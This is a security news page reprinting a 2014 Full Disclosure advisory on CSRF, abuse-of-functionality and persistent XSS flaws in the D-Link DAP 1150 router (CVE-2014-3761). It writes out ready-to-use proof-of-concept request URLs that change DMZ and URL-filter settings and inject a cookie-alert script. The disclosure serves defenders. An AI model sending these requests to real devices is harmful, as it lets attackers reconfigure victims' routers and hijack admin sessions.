Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2014-3761: CSRF, AoF and XSS vulnerabilities in D-Link DAP 1150

Cross-site scripting (XSS) vulnerability in D-Link DAP 1150 with firmware 1.2.94 allows remote attackers to inject arbitrary web script or HTML via the res_buf parameter to index.cgi in the Control/URL-filter section.

CVE
#xss#csrf#vulnerability#web#google#js#wifi

Full Disclosure mailing list archives

From: “MustLive” <mustlive () websecurity com ua>
Date: Fri, 18 Apr 2014 23:49:23 +0300

Hello list!

In 2011 and beginning of 2012 I wrote about multiple vulnerabilities (http://securityvulns.ru/docs27440.html, http://securityvulns.ru/docs27677.html, http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens). That time I wrote about vulnerabilities in admin panel in Access Point mode and now I’ll write about holes in Router mode.

I present new vulnerabilities in this device. There are Cross-Site Request Forgery, Abuse of Functionality and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

SecurityVulns ID: 12076.


Affected products:

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable. D-Link ignored all vulnerabilities in this device (as in other devices, which I informed them about) and still didn’t fix them.

---------- Details:


I remind you, that in the first report about vulnerabilities in D-Link DAP 1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in login form and other vulnerabilities, which allow to remotely log into admin panel for conducting CSRF and XSS attacks inside admin panel.

CSRF (WASC-09):

In section Firewall / DMZ via CSRF it’s possible to change settings of DMZ.

Turn on DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Turn off DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

In section Control / URL-filter via CSRF it’s possible to add, edit and delete settings of URL-filters.

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Edit:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Delete:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

This functionality can be used to block access to web sites for users of the router. Block access to google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

This is persistent XSS. The code will execute in section Control / URL-filter.

Attack via add function in parameter res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7112/).

Best wishes & regards, MustLive Administrator of Websecurity web site

http://websecurity.com.ua

_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

  • CSRF, AoF and XSS vulnerabilities in D-Link DAP 1150 MustLive (Apr 18)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907